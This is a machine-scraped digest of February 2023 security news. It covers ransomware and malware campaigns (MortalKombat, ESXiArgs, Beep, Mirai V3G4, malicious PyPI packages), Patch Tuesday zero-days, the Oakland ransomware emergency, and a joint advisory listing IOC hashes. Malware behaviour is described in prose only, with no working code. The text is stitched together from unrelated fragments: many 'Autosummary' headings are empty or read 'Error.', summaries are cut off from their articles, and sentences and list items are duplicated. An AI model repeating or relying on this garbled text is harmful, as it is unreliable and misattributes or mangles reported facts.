It’s also able to generate imitation addresses for a wide variety of cryptocurrencies including Monero, Bitcoin, Ethereum, Solana, and even Steam trading URLs. The tag-team campaign serves up ransomware known as Mortal Kombat, which borrows the name made famous by the video game, and Laplas Clipper malware, a clipboard stealer.According to Talos, it has mainly been seen in the US, as well as the Philippines, the UK, and Turkey. Instructions are then provided to download the aforementioned chat program, add the attackers as a “friend”, and begin communication. Once installed on a system, Mortal Kombat targets a large selection of files for encryption, based on their file extensions. "Threat actors used search engine ads to impersonate makers of popular software and direct internet users to malicious websites
The post Search ads abused to spread malware – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"Autosummary:
Like other exploitation kits, Havoc includes a wide variety of modules allowing pen testers (and hackers) to perform various tasks on exploited devices, including executing commands, managing processes, downloading additional payloads, manipulating Windows tokens, and executing shellcode. "Veeam Software has released the Veeam Data Platform, a single platform delivering more advanced data security, recovery and hybrid cloud capabilities. The Veeam Data Platform, which includes Veeam Backup & Replication (VBR) v12, provides secure backup and recovery that keeps business running. It brings together the latest features offered from Veeam into a single solution that is offered in three enterprise-grade editions for protecting Cloud, Virtual, Physical, SaaS and Kubernetes applications across complex and expanding … More
The post Veeam Data Platform improves business resiliency in the case of disaster or cyberattacks appeared first on Help Net Security.
"Autosummary:
Ensure backups can always be restored after a cyberattack with comprehensive, enterprise-grade immutability options from trusted vendors, including on-premises object, block and file storage, hardened repositories and deduplicating storage appliances, cloud object storage and tape.Trusted immutability for every workload: Ensure backups can always be restored after a cyberattack with comprehensive, enterprise-grade immutability options from trusted vendors, including on-premises object, block and file storage, hardened repositories and deduplicating storage appliances, cloud object storage and tape. New functionality that advances enterprise-grade recovery capabilities ensures confidence in the face of disaster or cyber-attacks across the hybrid cloud, including: Direct-to-object storage backups: Take full advantage of the unlimited scalability of on-premises and cloud object storage without sacrificing performance. "Autosummary:
"Autosummary:
"Talos researchers observed a financially motivated threat actor using a new ransomware dubbed MortalKombat and a clipper malware named Laplas. Since December 2022, Cisco Talos researchers have been observing an unidentified financially motivated threat actor deploying two new malware, the recently discovered MortalKombat ransomware and a GO variant of the Laplas Clipper malware. The threat actor […]
The post New MortalKombat ransomware employed in financially motivated campaign appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
The malware supports the following commands: Commands sent to Frebniis via specially crafted HTTP requests (Symantec) "If an HTTP call to logon.aspx or default.aspx is received without the password parameter, but with the Base64 string, the Base64 string is assumed to be C# code that will be executed straight in memory," explains Symantec"s report. "Autosummary:
"Autosummary:
Some of the spoofed applications include Google Chrome, Mozilla Firefox, Telegram, WhatsApp, LINE, Signal, Skype, Electrum, Sogou Pinyin Method, Youdao, and WPS Office. "Autosummary:
"Autosummary:
Special command line parameter (Morphisec) "ProxyShellMiner uses an embedded dictionary, an XOR decryption algorithm, and an XOR key downloaded from a remote server," describes the Morphisec report. "Autosummary:
Anonymous Sudan Telegram (BleepingComputer) The threat actors state they attacked SAS due to an event that took place in front of the Turkish embassy in Stockholm, Sweden, on January 21, 2023, where a far-right nationalist group burnt a copy of the Holy Quran in protest to Turkey"s objections over Sweden"s NATO membership bid. "Autosummary:
"ESXiArgs ransomware continues to spread in Europe, most of the recent infections were observed in France, Germany, the Netherlands, the UK, and Ukraine Researchers from Censys reported that more than 500 hosts have been infected in a new wave of ESXiArgs ransomware attacks, most of which are in France, Germany, the Netherlands, and the U.K.. […]
The post Over 500 ESXiArgs Ransomware infections in one day, but they dropped the day after appeared first on Security Affairs.
"Autosummary:
ESXiArgs ransomware continues to spread in Europe, most of the recent infections were observed in France, Germany, the Netherlands, the UK, and Ukraine Researchers from Censys reported that more than 500 hosts have been infected in a new wave of ESXiArgs ransomware attacks, most of which are in France, Germany, the Netherlands, and the U.K.. “Over the last few days, Censys has observed just over 500 hosts newly infected with ESXiArgs ransomware, most of which are in France, Germany, the Netherlands, and the UK.” "Autosummary:
Webmin command injection Spree Commerce arbitrary command execution FLIR Thermal Camera remote command execution CVE-2020-8515: DrayTek Vigor remote command execution CVE-2020-15415: DrayTek Vigor remote command execution CVE-2022-36267: "Categories: News Categories: Ransomware Tags: Oakland Tags: ransomware Tags: state of emergency The Interim City Administrator of the City of Oakland declared a state of emergency.after a ransomware attack crippled the city’s services a week ago |
The post Ransomware pushes City of Oakland into state of emergency appeared first on Malwarebytes Labs.
"Autosummary:
Fortunately, the attack has not affected crucial infrastructure like the 911 dispatch and fire and emergency resources, but the Oakland Police Department (OPD) did say that response time has been delayed and asked the public: If you don’t have an emergency or do not need an immediate emergency response, please consider the following means to report incidents: •OPD Online Reporting: oaklandca.gov •Oak 311: for urgent issues, call 311.Posted: February 16, 2023 by The Interim City Administrator of the City of Oakland declared a state of emergency.after a ransomware attack crippled the city’s services a week ago The ransomware attack that hit Oakland on Wednesday February 8, 2023 is still crippling many of the city’s services a week later. "Categories: Exploits and vulnerabilities Categories: News Tags: Yerodin Richards Tags: Arris Tags: routre Tags: CVE-2022-45701 Tags: default credentials A security researcher found an authenticated remote code execution vulnerability in very wide-spread Arris router models. |
The post Arris router vulnerability could lead to complete takeover appeared first on Malwarebytes Labs.
"Autosummary:
Affected devices The Arris Router Firmware version 9.1.103 authenticated RCE exploit has been tested against the TG2482A, TG2492, and SBG10 models, devices that can be commonly found in the Caribbean and Latin America, says Richards. According to Richards, when he contacted Arris (acquired by CommScope), the company said the devices running the vulnerable firmware are end-of-life (EOL) and are no longer supported by the company. "Categories: News Categories: Scams Tags: Hogwarts Legacy Tags: video game survey scam Tags: survey scam Tags: Trojan dropper Tags: adware With Hogwarts Legacy becoming the popular game it was expected to be, online criminals have resorted to old tricks to get users clicking. |
The post Fake Hogwarts Legacy cracks lead to adware, scams appeared first on Malwarebytes Labs.
"Autosummary:
But, as with all games like this, it comes with a steep price tag, so it"s no surprise to suddenly see websites peddling "cracked" versions of the game for free. "During the second half of 2022, a variant of the Mirai bot, tracked as V3G4, targeted IoT devices by exploiting tens of flaws. Palo Alto Networks Unit 42 researchers reported that a Mirai variant called V3G4 was attempting to exploit several flaws to infect IoT devices from July to December 2022. Below is the list […]
The post Mirai V3G4 botnet exploits 13 flaws to target IoT devices appeared first on Security Affairs.
"Autosummary:
The hardcoded command and control (C2) domains among these three campaigns contain the same string (8xl9) The malware shell script downloaders are almost identical between the three campaigns The botnet client samples use the same XOR decryption key The botnet client samples use the same “stop list” (a list of target processes that the botnet client searches for and terminates) The botnet client samples use almost identical functions The botnet exploited 13 vulnerabilities to achieve remote code execution on vulnerable devices. "Autosummary:
Vulnerable Technologies and Versions Sonicwall Sma 200 Firmware 10.2.0.8-37Sv Sonicwall Sma 200 Firmware 10.2.1.1-19Sv Sonicwall Sma 200 Firmware 10.2.1.2-24Sv Sonicwall Sma 210 Firmware 10.2.0.8-37Sv Sonicwall Sma 210 Firmware 10.2.1.1-19Sv Sonicwall Sma 210 Firmware 10.2.1.2-24Sv Sonicwall Sma 410 Firmware 10.2.0.8-37Sv Sonicwall Sma 410 Firmware 10.2.1.1-19Sv Sonicwall Sma 410 Firmware 10.2.1.2-24Sv Sonicwall Sma 400 Firmware 10.2.0.8-37Sv Sonicwall Sma 400 Firmware 10.2.1.1-19Sv Sonicwall Sma 400 Firmware 10.2.1.2-24Sv Sonicwall Sma 500V Firmware 10.2.0.8-37Sv Sonicwall Sma 500V Firmware 10.2.1.1-19Sv Sonicwall Sma 500V Firmware 10.2.1.2-24Sv See https://nvd.nist.gov/vuln/detail/CVE-2021-20038 for more information.Recommended Mitigations Apply all appropriate vendor updates Upgrade to: SMA 100 Series - (SMA 200, 210, 400, 410, 500v (ESX, Hyper-V, KVM, AWS, Azure): SonicWall SMA100 build versions 10.2.0.9-41sv or later SonicWall SMA100 build versions 10.2.1.3-27sv or later System administrators should refer to the SonicWall Security Advisories in the reference section to determine affected applications/systems and appropriate fix actions.Actors have also been observed using or possessing publically available tools for encryption, such as BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom [T1486].Actors have also been observed using or possessing publically available tools for encryption, such as BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom [T1486]. The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Department of Health and Human Services (HHS), the Republic of Korea (ROK) National Intelligence Service (NIS), and the ROK Defense Security Agency (DSA) (hereafter referred to as the “authoring agencies”) are issuing this joint Cybersecurity Advisory (CSA) to highlight ongoing ransomware activity against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities.Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes. RESOURCES Stairwell provided a YARA rule to identify Maui ransomware, and a Proof of Concept public RSA key extractor at the following link: https://www.stairwell.com/news/threat-research-report-maui-ransomware/ REQUEST FOR INFORMATION The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, bitcoin wallet information, the decryptor file, and/or benign samples of encrypted files. Appendix A: CVE Details CVE-2021-44228 CVSS 3.0: 10 (Critical) Vulnerability Description Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. SHA256 Hash 99fc54786a72f32fd44c7391c2171ca31e72ca52725c68e2dde94d04c286fccd* F8fc2445a9814ca8cf48a979bff7f182d6538f4d1ff438cf259268e8b4b76f86* Bea866b327a2dc2aa104b7ad7307008919c06620771ec3715a059e675d9f40af* 6e20b73a6057f8ff75c49e1b7aef08abfcfe4e418e2c1307791036f081335c2d f4d10b08d7dacd8fe33a6b54a0416eecdaed92c69c933c4a5d3700b8f5100fad 541825cb652606c2ea12fd25a842a8b3456d025841c3a7f563655ef77bb67219 2d978df8df0cf33830aba16c6322198e5889c67d49b40b1cb1eb236bd366826d 414ed95d14964477bebf86dced0306714c497cde14dede67b0c1425ce451d3d7 Df0c7bb88e3c67d849d78d13cee30671b39b300e0cda5550280350775d5762d8 MD5 Hash a2c2099d503fcc29478205f5aef0283b 9c516e5b95a7e4169ecbd133ed4d205f d6a7b5db62bf7815a10a17cdf7ddbd4b c6949a99c60ef29d20ac8a9a3fb58ce5 4b20641c759ed563757cdd95c651ee53 25ee4001eb4e91f7ea0bc5d07f2a9744 29b6b54e10a96e6c40e1f0236b01b2e8 18126be163eb7df2194bb902c359ba8e eaf6896b361121b2c315a35be837576d e4ee611533a28648a350f2dab85bb72a e268cb7ab778564e88d757db4152b9fa * from Microsoft blog post on h0lygh0st CONTACT INFORMATION NSA Client Requirements / General Cybersecurity Inquiries: CybersecurityReports@nsa.gov Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov To report incidents and anomalous activity related to information found in this Joint Cybersecurity Advisory, contact CISA’s 24/7 Operations Center at Report@cisa.gov or (888) 282-0870 or your local FBI field office at www.fbi.gov/contact-us/field. Appendix B: Indicators of Compromise (IOCs) The IOC section includes hashes and IP addresses for the Maui and H0lyGh0st ransomware variants—as well as custom malware implants assumedly developed by DPRK cyber actors, such as remote access trojans (RATs), loaders, and other tools—that enable subsequent deployment of ransomware. The authoring agencies urge HPH organizations to: Limit access to data by authenticating and encrypting connections (e.g., using public key infrastructure certificates in virtual private network (VPN) and transport layer security (TLS) connections) with network services, Internet of Things (IoT) medical devices, and the electronic health record system "Autosummary:
The full list of file extensions encrypted by the malware is: vmdk , vmx , vmxf , vmsd , vmsn , vswp , vmss , nvram , vmem . See the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. Organizations should also collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections.CISA and FBI encourage all organizations managing VMware ESXi servers to: The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) in response to the ongoing ransomware campaign, known as “ESXiArgs.”Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. "Finite State has released its Next Generation Platform featuring extended SBOM management with the ability to ingest and aggregate 120+ external data sources. The new platform gives Application and Product Security teams a unified and prioritized risk view with unprecedented visibility across the software supply chain lifecycle to scale operations through continuous, next-generation risk management. The launch of the Next Gen Platform will enable Finite State customers to continuously and confidently reduce risk across ‘any-party’ … More
The post Finite State releases Next Gen Platform for software supply chain security appeared first on Help Net Security.
"Autosummary:
Finite State’s Next Gen platform features will include: End-to-end SBOM solution: The solution for generating, collecting, visualizing, and distributing SBOMs in your supply chain. "Autosummary:
The three zero-days of note that have been exploited are as follows - CVE-2023-21715 (CVSS score: 7.3) - Microsoft Office Security Feature Bypass Vulnerability (CVSS score: 7.3) - Microsoft Office Security Feature Bypass Vulnerability CVE-2023-21823 (CVSS score: 7.8) - Windows Graphics Component Elevation of Privilege Vulnerability (CVSS score: 7.8) - Windows Graphics Component Elevation of Privilege Vulnerability CVE-2023-23376 (CVSS score: 7.8) - Windows Common Log File System (CLFS) "Autosummary:
"Adobe Patch Tuesday addressed at least a half dozen vulnerabilities, including critical issues that expose Windows and macOS to hack. Adobe released security updates to address at least a half dozen vulnerabilities impacting Photoshop, Illustrator and After Effects for both Windows and macOS users. Adobe addressed four critical issues (CVE-2022-24094, CVE-2022-24095, CVE-2022-24096, and CVE-2022-24097) affecting […]
The post Adobe addressed critical bugs in Illustrator, After Effects Software appeared first on Security Affairs.
"Autosummary:
"Experts detected a new evasive malware dubbed Beep, it implements many anti-debugging and anti-sandbox techniques. Researchers from Minerva recently discovered a new evasive malware dubbed Beep, which implements many anti-debugging and anti-sandbox techniques. The name Beep comes from the use of techniques involved in delaying the execution through the use of the Beep API function. The experts […]
The post Beep, a new highly evasive malware appeared in the threat landscape appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Beep malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Community Health Systems (CHS) disclosed a data breach, attackers exploited the zero-day vulnerability in Fortra’s GoAnywhere MFT platform. Community Health Systems (CHS) is one of the nation’s leading healthcare providers. CHS operates 79 acute-care hospitals and more than 1,000 other sites of care, including physician practices, urgent care centers, freestanding emergency departments, occupational medicine clinics, […]
The post Community Health Systems data breach caused by GoAnywhere MFT hack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Community Health Systems) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Autosummary:
Error. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The second rollout phase will be completed until June 2023 and will be for the following models: 2018-2022 Accent 2011-2016 Elantra 2021-2022 Elantra 2018-2020 Elantra GT 2011-2014 Genesis Coupe 2018-2022 Kona 2020-2021 Palisade 2013-2018 Santa Fe Sport 2013-2022 Santa Fe 2019 Santa Fe XL 2011-2014 Sonata 2011-2022 Tucson 2012-2017, 2019-2021 Veloster The free upgrade will be installed on Hyundai"s official dealers and service network in the U.S. and will take less than an hour. "The City of Oakland has declared a local state of emergency due to the effect of the ransomware attack that hit the city on February 8, 2023. The City of Oakland disclosed last week a ransomware attack, the security breach began on February 8, 2023. In an abundance of caution, the City of Oakland has […]
The post City of Oakland issued a local state of emergency after recent ransomware attack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: Exploits and vulnerabilities Categories: News Tags: patch Tuesday Tags: Microsoft Tags: Apple Tags: Adobe Tags: SAP Tags: Citrix Tags: Cisco Tags: Atlassian Tags: Google Tags: Mozilla Tags: Forta Tags: OpenSSH Tags: CVE-2023-21823 Tags: CVE-2023-21715 Tags: OneNote Tags: CVE-2023-23376 Tags: CVE-2023-21706 Tags: CVE-2023-21707 Tags: CVE-2023-21529 Tags: CVE-2023-21716 Tags: CVE-2023-23378 Tags: CVE-2023-22501 Tags: CVE-2023-24486 Tags: CVE-2023-24484 Tags: CVE-2023-24484 Tags: CVE-2023-24483 Tags: CVE-2023-25136 Tags: GoAnywhere Microsoft has released updates to patch three zero-days and lots of other vulnerabilities and so have several other vendors |
The post Update now! February"s Patch Tuesday tackles three zero-days appeared first on Malwarebytes Labs.
"Autosummary:
Citrix has released security updates to address high-severity vulnerabilities (CVE-2023-24486, CVE-2023-24484, CVE-2023-24485, and CVE-2023-24483) in Citrix Workspace Apps, Virtual Apps and Desktops.Posted: February 15, 2023 by Microsoft has released updates to patch three zero-days and lots of other vulnerabilities and so have several other vendors The Patch Tuesday roundup from Microsoft for February 2023 includes three zero-days. Unpatched Microsoft has also disclosed a vulnerability listed as CVE-2023-23378 in the end-of-life (EOL) application Print 3D. EOL is an expression commonly used by software vendors to indicate that a product or version of a product has reached the end of usefulness in the eyes of the vendor. "Categories: News Tags: Conti Tags: ransomware Tags: TrickBot Tags: sanction The US, in partnership with the UK, named individuals tied to TrickBot and shamed them with a sanction. |
The post TrickBot gang members sanctioned after pandemic ransomware attacks appeared first on Malwarebytes Labs.
"Autosummary:
Under Secretary of the Treasury for Terrorism and Financial Intelligence Brian E. Nelson said in a statement: "Cybercriminals, particularly those based in Russia, seek to attack critical infrastructure, target US businesses, and exploit the international financial system." According to the sanctions notice, in one attack the group deployed ransomware against three Minnesota medical facilities, disrupting their computer networks and telephones, and causing ambulances to divert. In a collaborative partnership, officials in the United States and the United Kingdom unmasked and imposed financial sanctions against seven members of the notorious Russian gang TrickBot (alias "TrickLoader"), a mainstream banking Trojan turned malware-as-a-service (MaaS) platform for other criminals. "Autosummary:
"Don’t be their next victim – here’s a handy round-up of some the most common signs that should set your alarm bells ringing
The post 10 signs that scammers have you in their sights appeared first on WeLiveSecurity
"Autosummary:
Popular tactics include cold-calling victims pretending, for example, that something is wrong with their computer (tech support fraud) or that there is something wrong with any of your valuable online accounts, i.e., typically those containing your personal and financial data.There is an almost limitless variety of themes, but phishing generally works via social engineering, a way that fraudsters trick victims into doing their bidding – for example by forcing them into making a rushed decision, and/or pretending to be a representative from a reputable organization like the government, a tech vendor or bank.When we’re finished with work, we’re hitting up our apps to watch TV, do our online banking, play games, socialize with friends – even visit the doctor. The “#WhatsApp Pink” trojan can now auto-reply to received messages not only on WhatsApp, but also Signal, Skype, Viber and Telegram. "Apple has released emergency security updates to fix a new actively exploited zero-day vulnerability that impacts iPhones, iPads, and Macs. Apple has released emergency security updates to address a new actively exploited zero-day vulnerability, tracked as CVE-2023-23529, that impacts iOS, iPadOS, and macOS. The flaw is a type confusion issue in WebKit that was addressed […]
The post Apple fixes the first zero-day in iPhones and Macs this year appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Apple) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Alleged Russian threat actors have been targeting cryptocurrency users in Eastern Europe with Enigma info-stealing malware. A malware campaign conducted by alleged Russian threat actors has been targeting users in Eastern European in the crypto industry. The attackers are sending out emails with fake job opportunities as bait in an attempt to trick victims into […]
The post Enigma info-stealing malware targets the cryptocurrency industry appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Enigma) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Upon opening the Microsoft Word document, the first-stage Enigma loader is launched, which, in turn, downloads and executes an obfuscated secondary-stage payload through Telegram. "The dire shortage of information security experts has left organizations struggling to keep up with the growing demand for their skills. Still, getting a job in cybersecurity tends to take time and effort. In this Help Net Security interview, Joseph Cooper, Cybersecurity Recruiter at Aspiron Search, offers practical advice for job seekers and talks about how the cybersecurity profession continues to expand. 1. Despite a significant cybersecurity skills gap, getting an entry-level job is difficult. … More
The post Get hired in cybersecurity: Expert tips for job seekers appeared first on Help Net Security.
"Autosummary:
My biggest piece of advice here would be to get close to a niche industry-specific recruiter like myself, I would welcome anyone to reach out for interview preparation, recruiters have a ton of valuable insight into the market, recruiting processes, and interview questions.We typically break cybersecurity into 16 category specialisms, so when you identify which area you would like to work in, for example, security testing or security operations, you can move on to my second piece of advice – here are the 16 specialisms.Try and keep your resume to 2 pages, if you have had a long career with multiple roles the reality is recruiters and hiring managers do not care about your first job out of school, they are focused very much on your last 3 roles, what your experience was, what you achieved and how you can add value in your next role. In this Help Net Security interview, Joseph Cooper, Cybersecurity Recruiter at Aspiron Search, offers practical advice for job seekers and talks about how the cybersecurity profession continues to expand. "Autosummary:
"Autosummary:
"Apple has released security updates that fix a WebKit zero-day vulnerability (CVE-2023-23529) that “may have been actively exploited.” The bug has been fixed in iOS 16.3.1 and iPadOS 16.3.1, macOS Ventura 13.2.1, Safari 16.3.1, and possibly also in tvOS 16.3.2 and watchOS 9.3.1 – though release notes for the updates for those Internet of Things operating systems have been temporarily witheld. About CVE-2023-23529 CVE-2023-23529 is a type confusion issue in WebKit, the browser engine powering … More
The post Apple fixes actively exploited WebKit zero-day in iOS, macOS (CVE-2023-23529) appeared first on Help Net Security.
"Autosummary:
"“Swiss Army knife” malware – multi-purpose malware that can perform malicious actions across the cyber-kill chain and evade detection by security controls – is on the rise, according to the results of Picus Security’s analysis of over 550,000 real-world malware samples gathered from commercial and open-source threat intelligence services, security vendors and researchers, and malware sandboxes and databases. Key findings By observing the malware’s behavior, the company’s researchers extracted over 5 million malicious actions and … More
The post Malware that can do anything and everything is on the rise appeared first on Help Net Security.
"Autosummary:
The collection of data about computer systems or networks (to facilitate lateral movement) The use of remote services (e.g., RDP, SSH, VNC, etc.) for access and control The abuse of Windows Management Instrumentation to execute malicious commands and payloads in compromised Windows hosts The use of scheduled tasks/jobs Anti-virtualization and anti-sandboxing capabilities The discovery of remote hosts and networks The analysis has shown that: The average malware leverages 11 different tactics, techniques, and procedures (TTPs). "Autosummary:
"Autosummary:
Source: CISO Point of View: The ever-changing role of data, and the implications for data protection & storage security (Continuity) CISOs are concerned about the rise of ransomware – not only of the proliferation of attacks but also of their sophistication: "The storage and backup environments are now under attack, as the attackers realize that this is the single biggest determining factor to show if the company will pay the ransom," says George Eapen, Group CIO (and former CISO) at Petrofac, John Meakin, former CISO at GlaxoSmithKline, BP, Standard Chartered, and Deutsche Bank believes that "As important as it may be, data encryption is hardly enough to protect an organization"s core data. 4 Steps to Success Define comprehensive security baselines for all components of storage and backup systems (NIST Special Publication 800-209; Security Guidelines for Storage Infrastructure provides a comprehensive set of recommendations for the secure deployment, configuration, and operation of storage & backup systems) Use automation to reduce exposure to risk, and allow much more agility in adapting to changing priorities. "Autosummary:
"Autosummary:
Organizations that had their Accellion servers hacked include, among others, energy giant Shell, cybersecurity firm Qualys, supermarket giant Kroger, and multiple universities worldwide such as Stanford Medicine, University of Colorado, University of Miami, University of California, and the University of Maryland Baltimore (UMB). "Autosummary:
Collecting data from the breached system (Minerva) Despite the limitations in the analysis of the malware, Minerva was still able to identify the following functions in the sample, which are triggered by C2 commands: balancer – not implemented yet – not implemented yet init – not implemented yet – not implemented yet screenshot – appears to collect the process list – appears to collect the process list task – not implemented yet – not implemented yet destroy – not implemented yet – not implemented yet shellcode – executes additional shellcode – executes additional shellcode dll – executes a dll file – executes a dll file exe – executes an .exe file – executes an .exe file Additional – collects additional info – collects additional info knock_timeout – changes C&C "keep-alive" intervals Evading detection What makes the Beep malware stand out is its use of multiple techniques throughout its execution flow to evade detection and analysis by security software and researchers. String deobfuscation (Minerva) In addition to the above, the injector component also implements the following evasion techniques: INT 3 anti-debugging – Generate an exception that will force debuggers to stop working. "Autosummary:
All file types targeted by the ransomware (Cisco) "Talos observed that MortalKombat encrypts various files on the victim machine’s filesystem, such as system, application, database, backup, and virtual machine files, as well as files on the remote locations mapped as logical drives in the victim’s machine," describes the report. "Threat actors published more than 451 unique malware-laced Python packages on the official Python Package Index (PyPI) repository. Phylum researchers spotted more than 451 unique Python packages on the official Python Package Index (PyPI) repository in an attempt to deliver clipper malware on the developer systems. According to the experts, the activity is still ongoing […]
The post Experts discover over 451 clipper malware-laced packages in the PyPI repository appeared first on Security Affairs.
"Autosummary:
Threat actors have typosquatted several major packages in PyPI such as: bitcoinlib ccxt cryptocompare cryptofeed freqtrade selenium solana vyper websockets yfinance pandas matplotlib aiohttp beautifulsoup tensorflow selenium scrapy colorama scikit-learn pytorch pygame pyinstaller The researchers reported that the attackers are trying to register the same code in every possible simple typo of a package name. "Autosummary:
The number of bugs in each vulnerability category is listed below: 12 Elevation of Privilege Vulnerabilities 2 Security Feature Bypass Vulnerabilities 38 Remote Code Execution Vulnerabilities 8 Information Disclosure Vulnerabilities 10 Denial of Service Vulnerabilities 8 Spoofing Vulnerabilities This count does not include three Microsoft Edge vulnerabilities fixed earlier this month. "The February 2023 Patch Tuesday is upon us, with Microsoft releasing patches for 75 CVE-numbered vulnerabilities, including three actively exploited zero-day flaws (CVE-2023-21715, CVE-2023-23376, CVE-2023-21823). The three zero-days (CVE-2023-21715, CVE-2023-23376, CVE-2023-21823) CVE-2023-21715 a vulnerability that allows attackers to bypass a Microsoft Publisher security feature: Office macro policies used to block untrusted or malicious files. “The attack itself is carried out locally by a user with authentication to the targeted system. An authenticated attacker could exploit … More
The post Microsoft patches three exploited zero-days (CVE-2023-21715, CVE-2023-23376, CVE-2023-21823) appeared first on Help Net Security.
"Autosummary:
The February 2023 Patch Tuesday is upon us, with Microsoft releasing patches for 75 CVE-numbered vulnerabilities, including three actively exploited zero-day flaws (CVE-2023-21715, CVE-2023-23376, CVE-2023-21823). "Autosummary:
"Autosummary:
This JPG image file uses steganography, a technique that allows hiding code inside files, to stealthily introduce the M2RAT executable ("lskdjfei.exe") onto the system and inject it into "explorer.exe." Malware code hiding in the JPEG file (ASEC) For persistence on the system, the malware adds a new value ("RyPO") in the "Run" Registry key, with commands to execute a PowerShell script via "cmd.exe." "Microsoft Patch Tuesday security updates for February 2023 addressed 75 flaws, including three actively exploited zero-day bugs. Microsoft Patch Tuesday security updates for February 2023 fixed 75 vulnerabilities in multiple products, including Microsoft Windows and Windows Components; Office and Office Components; Exchange Server; .NET Core and Visual Studio Code; 3D Builder and Print 3D; Microsoft […]
The post Microsoft Patch Tuesday for February 2023 fixed actively exploited zero-days appeared first on Security Affairs.
"Autosummary:
Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Cybercriminals remained active in spying and information stealing, with lottery-themed adware campaigns used as a tactic to obtain people’s contact details, according to Avast. Threats using social engineering to steal money, such as refund and invoice fraud and tech support scams, increased during Q4 of 2022. Threat researchers also discovered zero-day exploits in Google Chrome and Windows. These vulnerabilities have since been patched. “At the end of 2022, we have seen an increase in human-centered … More
The post Cybercriminals exploit fear and urgency to trick consumers appeared first on Help Net Security.
"Autosummary:
There was also a 57% increase in people and businesses protected against AgentTesla, a strain of malware that often spreads through phishing emails to businesses and designed to steal credentials, as well as a 37% increase in RedLine stealer, which often spreads in cracked games and services, stealing information from browsers and cryptowallets.Fraudulent invoices often look legitimate, and people need to verify whether an order really was made, the service received, and whether the sender is truly who they pretend to be ,” said Kroustek. "Autosummary:
DarkBit"s Twitter account with #HackForGood tag and tweets criticising layoffs While attacking Israel for being an "aparheid regime," DarkBit attackers want to make them pay for "war crimes against humanity" and "firing high-skilled experts." "A kindly advice to the hight-tech companies: From now on, be more careful when you decide to fire your employees, specially the geek ones [sic]," DarkBit said in a subsequent tweet. "The Ali’s Justice (Edalat-e Ali) hacker group broke into the State TV broadcast during the President’s speech on Revolution Day. A collective of hackers that calls itself Ali’s Justice (Edalat-e Ali) disrupted the transmission of an Iranian State TV and radio station and aired the slogan “Death to Khamenei” asking Iranians to withdraw their money […]
The post Hacktivists hacked Iranian State TV during President’s speech on Revolution Day appeared first on Security Affairs.
"Autosummary:
⚠️ Confirmed: Real-time network data show a near-total disruption to internet connectivity in #Sanandaj, the capital of Kurdistan Province in west #Iran; the incident comes amid widening protests over the death of #MahsaAmini after her arrest by morality police 📉 pic.twitter.com/wZVHJjgpiR — NetBlocks (@netblocks) September 19, 2022 Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Iranian State TV) "Autosummary:
"Autosummary:
DarkBit"s Twitter account with #HackForGood tag and tweets criticising layoffs While attacking Israel for being an "aparheid regime," DarkBit attackers want to make them pay for "war crimes against humanity" and "firing high-skilled experts." "A kindly advice to the hight-tech companies: From now on, be more careful when you decide to fire your employees, specially the geek ones [sic]," DarkBit said in a subsequent tweet. "A surge of phishing emails impersonating DHL and MetaMask have started hitting inboxes of Namecheap customers last week, attempting to trick recipients into sharing personal information or sharing their crypto wallet’s secret recovery phrase. Attention @Namecheap users: be wary of suspicious emails claiming to be from DHL. #phishing scams are rampant and it"s crucial to keep your personal information safe. Time for #Namecheap to enhance their security measures. #cybersecurity #emailscams pic.twitter.com/kTPvY90b7d — Gbenga (@lemogbenga) February … More
The post DHL, MetaMask phishing emails target Namecheap customers appeared first on Help Net Security.
"Autosummary:
